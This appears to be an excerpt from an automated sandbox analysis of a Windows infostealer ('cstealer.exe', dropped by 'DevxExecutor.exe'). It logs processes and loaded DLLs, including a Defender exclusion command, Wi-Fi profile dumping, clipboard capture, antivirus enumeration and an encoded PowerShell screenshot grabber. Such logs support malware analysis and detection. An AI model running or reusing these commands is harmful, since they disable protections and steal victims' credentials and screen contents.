                                Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: python3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libffi-8.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libssl-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: sqlite3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\main.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: python3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libffi-8.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libssl-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: sqlite3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: vcruntime140.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: version.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: python3.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: libffi-8.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: sqlite3.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: iphlpapi.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: libcrypto-1_1.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: libssl-1_1.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: mswsock.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: dnsapi.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: rasadhlp.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: fwpuclnt.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: msasn1.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: avicap32.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: msvfw32.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: dciman32.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmmbase.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: mmdevapi.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: devobj.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: ksuser.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: avrt.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: audioses.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: powrprof.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: umpdc.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: msacm32.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: midimap.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: dpapi.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\Microsoft\based.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeSection loaded: wintypes.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: version.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: vcruntime140.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptsp.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: rsaenh.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptbase.dll
                                Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: sfc_os.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeSection loaded: coremessaging.dll
